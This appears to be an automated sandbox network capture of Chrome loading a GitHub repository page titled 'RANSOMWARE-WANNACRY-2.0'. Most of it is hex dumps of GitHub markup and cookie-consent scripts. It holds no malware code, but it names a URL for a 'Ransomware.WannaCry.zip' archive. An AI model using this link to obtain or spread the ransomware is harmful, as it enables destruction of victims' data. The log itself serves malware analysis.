                                                                                      2024-03-23 14:47:27 UTC1370INData Raw: 38 30 30 30 0d 0a 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 65 70 6f 73 69 74 6f 72 79 2d 64 65 74 61 69 6c 73 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 72 65 70 6c 61 63 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 70 61 67 65 68 65 61 64 2d 61 63 74 69 6f 6e 73 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 64 2d 6e 6f 6e 65 20 64 2d 6d 64 2d 69 6e 6c 69 6e 65 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 32 70 78 20 30 3b 22 3e 0a 20 20 20 20 0a 20 20 20 20 20 20 0a 0a 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 6c 6f 67 69 6e 3f 72 65 74 75 72 6e 5f 74 6f 3d 25 32 46 63 68 72 6f 6e 6f 73 6d 69 6b 69 25 32 46 52 41
                                                                                      Data Ascii: 8000 <div id="repository-details-container" data-turbo-replace> <ul class="pagehead-actions flex-shrink-0 d-none d-md-inline" style="padding: 2px 0;"> <li> <a href="/login?return_to=%2Fchronosmiki%2FRA
                                                                                      2024-03-23 14:47:27 UTC1370INData Raw: 32 2e 35 35 36 61 2e 30 31 37 2e 30 31 37 20 30 20 30 20 30 2d 2e 30 30 33 2e 30 31 6c 2e 30 30 31 2e 30 30 36 63 30 20 2e 30 30 32 2e 30 30 32 2e 30 30 34 2e 30 30 34 2e 30 30 36 6c 2e 30 30 36 2e 30 30 34 2e 30 30 37 2e 30 30 31 68 31 30 2e 39 36 34 6c 2e 30 30 37 2d 2e 30 30 31 2e 30 30 36 2d 2e 30 30 34 2e 30 30 34 2d 2e 30 30 36 2e 30 30 31 2d 2e 30 30 37 61 2e 30 31 37 2e 30 31 37 20 30 20 30 20 30 2d 2e 30 30 33 2d 2e 30 31 6c 2d 31 2e 37 30 33 2d 32 2e 35 35 34 61 31 2e 37 34 35 20 31 2e 37 34 35 20 30 20 30 20 31 2d 2e 32 39 34 2d 2e 39 37 56 35 41 33 2e 35 20 33 2e 35 20 30 20 30 20 30 20 38 20 31 2e 35 5a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 0a 3c 2f 61 3e 0a 20 20 3c 2f 6c 69 3e 0a 0a 20 20 3c
                                                                                      Data Ascii: 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications</a> </li> <
                                                                                      2024-03-23 14:47:27 UTC1370INData Raw: 2e 37 35 20 30 20 31 20 30 2d 31 2e 35 20 30 20 2e 37 35 2e 37 35 20 30 20 30 20 30 20 31 2e 35 20 30 5a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 46 6f 72 6b 0a 20 20 20 20 3c 73 70 61 6e 20 69 64 3d 22 72 65 70 6f 2d 6e 65 74 77 6f 72 6b 2d 63 6f 75 6e 74 65 72 22 20 64 61 74 61 2d 70 6a 61 78 2d 72 65 70 6c 61 63 65 3d 22 74 72 75 65 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 72 65 70 6c 61 63 65 3d 22 74 72 75 65 22 20 74 69 74 6c 65 3d 22 31 39 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 43 6f 75 6e 74 65 72 22 3e 31 39 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 20 20 3c 2f 6c 69 3e 0a 0a 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70
                                                                                      Data Ascii: .75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span id="repo-network-counter" data-pjax-replace="true" data-turbo-replace="true" title="19" data-view-component="true" class="Counter">19</span></a> </li> <li> <div data-view-comp
                                                                                      2024-03-23 14:47:27 UTC1370INData Raw: 2e 36 31 31 4c 37 2e 33 32 37 2e 36 36 38 41 2e 37 35 2e 37 35 20 30 20 30 20 31 20 38 20 2e 32 35 5a 6d 30 20 32 2e 34 34 35 4c 36 2e 36 31 35 20 35 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 20 31 2d 2e 35 36 34 2e 34 31 6c 2d 33 2e 30 39 37 2e 34 35 20 32 2e 32 34 20 32 2e 31 38 34 61 2e 37 35 2e 37 35 20 30 20 30 20 31 20 2e 32 31 36 2e 36 36 34 6c 2d 2e 35 32 38 20 33 2e 30 38 34 20 32 2e 37 36 39 2d 31 2e 34 35 36 61 2e 37 35 2e 37 35 20 30 20 30 20 31 20 2e 36 39 38 20 30 6c 32 2e 37 37 20 31 2e 34 35 36 2d 2e 35 33 2d 33 2e 30 38 34 61 2e 37 35 2e 37 35 20 30 20 30 20 31 20 2e 32 31 36 2d 2e 36 36 34 6c 32 2e 32 34 2d 32 2e 31 38 33 2d 33 2e 30 39 36 2d 2e 34 35 61 2e 37 35 2e 37 35 20 30 20 30 20 31 2d 2e 35 36 34 2d 2e 34 31 4c 38 20 32 2e 36 39 34
                                                                                      Data Ascii: .611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694
                                                                                      2024-03-23 14:47:27 UTC1370INData Raw: 70 61 64 64 69 6e 67 3a 20 32 70 78 20 30 3b 22 3e 0a 20 20 20 20 0a 20 20 20 20 20 20 0a 0a 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 6c 6f 67 69 6e 3f 72 65 74 75 72 6e 5f 74 6f 3d 25 32 46 63 68 72 6f 6e 6f 73 6d 69 6b 69 25 32 46 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 3d 22 7b 26 71 75 6f 74 3b 65 76 65 6e 74 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 2e 63 6c 69 63 6b 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 70 61 79 6c 6f 61 64 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 6c 6f 63 61 74 69 6f 6e 5f 69 6e 5f 70 61 67 65 26 71 75 6f
                                                                                      Data Ascii: padding: 2px 0;"> <li> <a href="/login?return_to=%2Fchronosmiki%2FRANSOMWARE-WANNACRY-2.0" rel="nofollow" data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quot;,&quot;payload&quot;:{&quot;location_in_page&quo
                                                                                      2024-03-23 14:47:27 UTC1370INData Raw: 2e 37 34 35 20 31 2e 37 34 35 20 30 20 30 20 31 2d 2e 32 39 34 2d 2e 39 37 56 35 41 33 2e 35 20 33 2e 35 20 30 20 30 20 30 20 38 20 31 2e 35 5a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 0a 3c 2f 61 3e 0a 20 20 3c 2f 6c 69 3e 0a 0a 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 61 20 69 63 6f 6e 3d 22 72 65 70 6f 2d 66 6f 72 6b 65 64 22 20 69 64 3d 22 66 6f 72 6b 2d 62 75 74 74 6f 6e 22 20 68 72 65 66 3d 22 2f 6c 6f 67 69 6e 3f 72 65 74 75 72 6e 5f 74 6f 3d 25 32 46 63 68 72 6f 6e 6f 73 6d 69 6b 69 25 32 46 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 3d 22 7b 26 71 75 6f 74 3b 65 76
                                                                                      Data Ascii: .745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications</a> </li> <li> <a icon="repo-forked" id="fork-button" href="/login?return_to=%2Fchronosmiki%2FRANSOMWARE-WANNACRY-2.0" rel="nofollow" data-hydro-click="{&quot;ev
                                                                                      2024-03-23 14:47:27 UTC1370INData Raw: 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 43 6f 75 6e 74 65 72 22 3e 31 39 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 20 20 3c 2f 6c 69 3e 0a 0a 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 42 74 6e 47 72 6f 75 70 20 64 2d 66 6c 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 6c 6f 67 69 6e 3f 72 65 74 75 72 6e 5f 74 6f 3d 25 32 46 63 68 72 6f 6e 6f 73 6d 69 6b 69 25 32 46 52 41 4e 53 4f 4d 57 41 52 45 2d 57 41 4e 4e 41 43 52 59 2d 32 2e 30 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 3d 22 7b 26 71 75 6f 74 3b 65 76 65 6e 74 5f
                                                                                      Data Ascii: iew-component="true" class="Counter">19</span></a> </li> <li> <div data-view-component="true" class="BtnGroup d-flex"> <a href="/login?return_to=%2Fchronosmiki%2FRANSOMWARE-WANNACRY-2.0" rel="nofollow" data-hydro-click="{&quot;event_
                                                                                      2024-03-23 14:47:27 UTC1370INData Raw: 6c 32 2e 37 37 20 31 2e 34 35 36 2d 2e 35 33 2d 33 2e 30 38 34 61 2e 37 35 2e 37 35 20 30 20 30 20 31 20 2e 32 31 36 2d 2e 36 36 34 6c 32 2e 32 34 2d 32 2e 31 38 33 2d 33 2e 30 39 36 2d 2e 34 35 61 2e 37 35 2e 37 35 20 30 20 30 20 31 2d 2e 35 36 34 2d 2e 34 31 4c 38 20 32 2e 36 39 34 5a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 3c 73 70 61 6e 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 64 2d 69 6e 6c 69 6e 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 53 74 61 72 0a 3c 2f 73 70 61 6e 3e 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 69 64 3d 22 72 65 70 6f 2d 73 74 61 72 73 2d 63 6f 75 6e 74 65 72 2d 73 74 61 72 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 33 30 20 75 73 65 72 73 20 73 74 61 72
                                                                                      Data Ascii: l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span data-view-component="true" class="d-inline"> Star</span> <span id="repo-stars-counter-star" aria-label="30 users star
                                                                                      2024-03-23 14:47:27 UTC1370INData Raw: 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 66 6c 61 73 68 20 66 6c 61 73 68 2d 77 61 72 6e 20 6d 74 2d 30 20 63 6c 65 61 72 66 69 78 22 3e 0a 20 20 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 61 6c 65 72 74 20 66 6c 6f 61 74 2d 6c 65 66 74 20 6d 74 2d 31 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 36 2e 34 35 37 20 31 2e 30 34 37 63 2e 36 35 39 2d 31 2e 32 33 34 20 32 2e 34 32 37 2d 31 2e 32
                                                                                      Data Ascii: "true" class="flash flash-warn mt-0 clearfix"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert float-left mt-1"> <path d="M6.457 1.047c.659-1.234 2.427-1.2


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      81192.168.2.1649788185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC712OUTGET /assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-80fd8ee00406.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:26 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 8781
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 22 Feb 2024 16:53:09 GMT
                                                                                      ETag: 0x8DC33C6BFA4E41E
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Age: 2002760
                                                                                      X-Served-By: cache-iad-kiad7000140-IAD, cache-ewr18139-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 1713, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 654e7a9904729568831ebc1a51f9562d2569303f
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 63 6f 6f 6b 69 65 2d 63 6f 6e 73 65 6e 74 2d 6c 69 6e 6b 2d 65 6c 65 6d 65 6e 74 5f 63 6f 6f 6b 69 65 2d 63 6f 6e 73 65 6e 74 2d 6c 69 6e 6b 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 5d 2c 7b 33 30 36 34 30 3a 28 65 2c 6f 2c 74 29 3d 3e 7b 74 2e 72 28 6f 29 2c 74 2e 64 28 6f 2c 7b 43 6f 6f 6b 69 65 43 6f 6e 73 65 6e 74 4c 69 6e 6b 45 6c 65 6d 65 6e 74 3a 28 29 3d 3e 69 7d 29 3b 76 61 72 20 72 3d 74 28 37 36 30 30 36 29 2c 61 3d 74 28 36 33 32 37 36 29 3b 6c 65 74 20 69 3d 63 6c 61 73 73 20 43 6f 6f 6b 69
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts"],{30640:(e,o,t)=>{t.r(o),t.d(o,{CookieConsentLinkElement:()=>i});var r=t(76006),a=t(63276);let i=class Cooki
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 65 78 70 65 72 69 65 6e 63 65 2c 20 69 6d 70 72 6f 76 65 20 70 65 72 66 6f 72 6d 61 6e 63 65 2c 20 72 6f 75 74 65 20 74 72 61 66 66 69 63 20 62 65 74 77 65 65 6e 20 77 65 62 20 73 65 72 76 65 72 73 2c 20 64 65 74 65 63 74 20 74 68 65 20 73 69 7a 65 20 6f 66 20 79 6f 75 72 20 73 63 72 65 65 6e 2c 20 64 65 74 65 72 6d 69 6e 65 20 70 61 67 65 20 6c 6f 61 64 20 74 69 6d 65 73 2c 20 69 6d 70 72 6f 76 65 20 75 73 65 72 20 65 78 70 65 72 69 65 6e 63 65 2c 20 61 6e 64 20 66 6f 72 20 61 75 64 69 65 6e 63 65 20 6d 65 61 73 75 72 65 6d 65 6e 74 2e 20 54 68 65 73 65 20 63 6f 6f 6b 69 65 73 20 61 72 65 20 6e 65 63 65 73 73 61 72 79 20 66 6f 72 20 6f 75 72 20 77 65 62 73 69 74 65 73 20 74 6f 20 77 6f 72 6b 2e 22 2c 69 73 55 6e 73 77 69 74 63 68 61 62 6c 65 3a 21 30 7d
                                                                                      Data Ascii: experience, improve performance, route traffic between web servers, detect the size of your screen, determine page load times, improve user experience, and for audience measurement. These cookies are necessary for our websites to work.",isUnswitchable:!0}
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 20 79 6f 75 20 61 6e 64 20 66 6f 72 20 62 75 73 69 6e 65 73 73 20 70 75 72 70 6f 73 65 73 20 77 69 74 68 20 6f 75 72 20 61 64 76 65 72 74 69 73 69 6e 67 20 70 61 72 74 6e 65 72 73 2e 20 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 63 6f 6f 6b 69 65 73 20 61 72 65 20 75 73 65 64 20 74 6f 20 64 65 74 65 63 74 20 77 68 65 6e 20 79 6f 75 20 63 6c 69 63 6b 20 61 6e 20 61 64 20 61 6e 64 20 74 6f 20 73 68 6f 77 20 79 6f 75 20 61 64 73 20 62 61 73 65 64 20 6f 6e 20 79 6f 75 72 20 73 6f 63 69 61 6c 20 6d 65 64 69 61 20 69 6e 74 65 72 65 73 74 73 20 61 6e 64 20 77 65 62 73 69 74 65 20 62 72 6f 77 73 69 6e 67 20 68 69 73 74 6f 72 79 2e 22 7d 5d 2c 6c 3d 7b 62 61 6e 6e 65 72 4d 65 73 73 61 67 65 48 74 6d 6c 3a 60 57 65 20 75 73 65 20 6f 70 74 69 6f 6e 61 6c 20 63 6f 6f 6b
                                                                                      Data Ascii: you and for business purposes with our advertising partners. For example, cookies are used to detect when you click an ad and to show you ads based on your social media interests and website browsing history."}],l={bannerMessageHtml:`We use optional cook
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 20 74 65 78 74 20 66 69 6c 65 73 20 70 6c 61 63 65 64 20 6f 6e 20 79 6f 75 72 20 64 65 76 69 63 65 20 74 6f 20 73 74 6f 72 65 20 64 61 74 61 20 73 6f 20 77 65 62 20 73 65 72 76 65 72 73 20 63 61 6e 20 75 73 65 20 69 74 20 6c 61 74 65 72 2e 20 47 69 74 48 75 62 20 61 6e 64 20 6f 75 72 20 74 68 69 72 64 2d 70 61 72 74 79 20 70 61 72 74 6e 65 72 73 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 74 6f 20 72 65 6d 65 6d 62 65 72 20 79 6f 75 72 20 70 72 65 66 65 72 65 6e 63 65 73 20 61 6e 64 20 73 65 74 74 69 6e 67 73 2c 20 68 65 6c 70 20 79 6f 75 20 73 69 67 6e 20 69 6e 2c 20 73 68 6f 77 20 79 6f 75 20 70 65 72 73 6f 6e 61 6c 69 7a 65 64 20 61 64 73 2c 20 61 6e 64 20 61 6e 61 6c 79 7a 65 20 68 6f 77 20 77 65 6c 6c 20 6f 75 72 20 77 65 62 73 69 74 65 73 20 61 72 65 20
                                                                                      Data Ascii: text files placed on your device to store data so web servers can use it later. GitHub and our third-party partners use cookies to remember your preferences and settings, help you sign in, show you personalized ads, and analyze how well our websites are
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 69 64 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 77 68 69 74 65 29 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 62 6f 72 64 65 72 22 3a 22 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 67 72 61 79 2d 35 29 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 66 6f 63 75 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 22 3a 22 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 67 72 61 79 2d 35 29 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 22 3a 22 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 77 68 69 74 65 29 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 74 65 78
                                                                                      Data Ascii: id var(--color-scale-white)","secondary-button-disabled-border":"1px solid var(--color-scale-gray-5)","secondary-button-focus-border-color":"var(--color-scale-gray-5)","secondary-button-text-color":"var(--color-scale-white)","secondary-button-disabled-tex
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 2e 65 28 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 63 6f 6e 73 65 6e 74 2d 62 61 6e 6e 65 72 5f 64 69 73 74 5f 63 6f 6e 73 65 6e 74 2d 62 61 6e 6e 65 72 5f 6a 73 22 29 2e 74 68 65 6e 28 74 2e 74 2e 62 69 6e 64 28 74 2c 39 34 32 32 39 2c 32 33 29 29 2c 6f 3d 6e 65 77 20 65 28 22 63 6f 6f 6b 69 65 2d 63 6f 6e 73 65 6e 74 2d 62 61 6e 6e 65 72 22 2c 22 65 6e 22 2c 68 2c 63 2c 64 29 3b 79 2e 72 65 73 6f 6c 76 65 28 6f 29 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 76 28 29 7b 6c 65 74 20 65 3d 61 77 61 69 74 20 6d 28 29 3b 65 2e 73 68 6f 77 50 72 65 66 65 72 65 6e 63 65 73 28 43 28 29 7c 7c 7b 7d 29 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 66 28 29 7b 6c 65 74 20 65 3d 61 77 61 69 74 20 6d 28 29 3b 65 2e 73 68 6f 77 42 61 6e
                                                                                      Data Ascii: .e("vendors-node_modules_consent-banner_dist_consent-banner_js").then(t.t.bind(t,94229,23)),o=new e("cookie-consent-banner","en",h,c,d);y.resolve(o)}async function v(){let e=await m();e.showPreferences(C()||{})}async function f(){let e=await m();e.showBan
                                                                                      2024-03-23 14:47:26 UTC513INData Raw: 3d 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 61 3d 6e 65 77 20 44 61 74 65 28 72 2d 31 29 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 2c 69 3d 22 68 74 74 70 73 3a 22 3d 3d 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 3f 22 3b 20 73 65 63 75 72 65 22 3a 22 22 2c 6e 3d 60 3b 20 65 78 70 69 72 65 73 3d 24 7b 61 7d 60 3b 21 31 3d 3d 3d 6f 26 26 28 74 3d 60 2e 24 7b 74 7d 60 29 3b 74 72 79 7b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 60 24 7b 65 7d 3d 27 27 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 24 7b 74 7d 24 7b 6e 7d 24 7b 69 7d 60 7d 63 61 74 63 68 7b 7d 7d 74 2e 64 28 6f 2c 7b 24 31 3a 28 29 3d 3e 61 2c 64 38 3a 28 29 3d 3e 69 2c 65 6a 3a 28 29 3d 3e 72 2c 6b 54 3a 28 29 3d 3e 6e 7d 29 7d 2c 36 34 37 39 39 3a
                                                                                      Data Ascii: =new Date().getTime(),a=new Date(r-1).toUTCString(),i="https:"===location.protocol?"; secure":"",n=`; expires=${a}`;!1===o&&(t=`.${t}`);try{document.cookie=`${e}=''; path=/; domain=${t}${n}${i}`}catch{}}t.d(o,{$1:()=>a,d8:()=>i,ej:()=>r,kT:()=>n})},64799:


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      82192.168.2.1649786185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC694OUTGET /assets/ui_packages_query-builder-element_query-builder-element_ts-5fadb36426c7.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:26 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 27638
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Wed, 28 Feb 2024 13:59:24 GMT
                                                                                      ETag: 0x8DC3865786E8FB9
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Age: 1552408
                                                                                      X-Served-By: cache-iad-kjyo7100093-IAD, cache-ewr18163-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 442, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 845bf91bf4c8003a5bf874898a8a5a3fad992ffe
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 71 75 65 72 79 2d 62 75 69 6c 64 65 72 2d 65 6c 65 6d 65 6e 74 5f 71 75 65 72 79 2d 62 75 69 6c 64 65 72 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 5d 2c 7b 35 35 33 39 39 3a 28 74 2c 65 2c 69 29 3d 3e 7b 69 2e 64 28 65 2c 7b 64 79 3a 28 29 3d 3e 6c 2e 64 79 2c 73 59 3a 28 29 3d 3e 6c 2e 73 59 2c 41 75 3a 28 29 3d 3e 6c 2e 41 75 7d 29 3b 76 61 72 20 73 3d 69 28 34 37 39 34 30 29 2c 61 3d 69 28 35 30 36 35 35 29 3b 6c 65 74 20 6e 3d 22 6a 74 6d 6c 2d 6e 6f 2d 6f 70 22 2c 72 3d 73 2e 5a 4f 2e 63 72 65 61 74
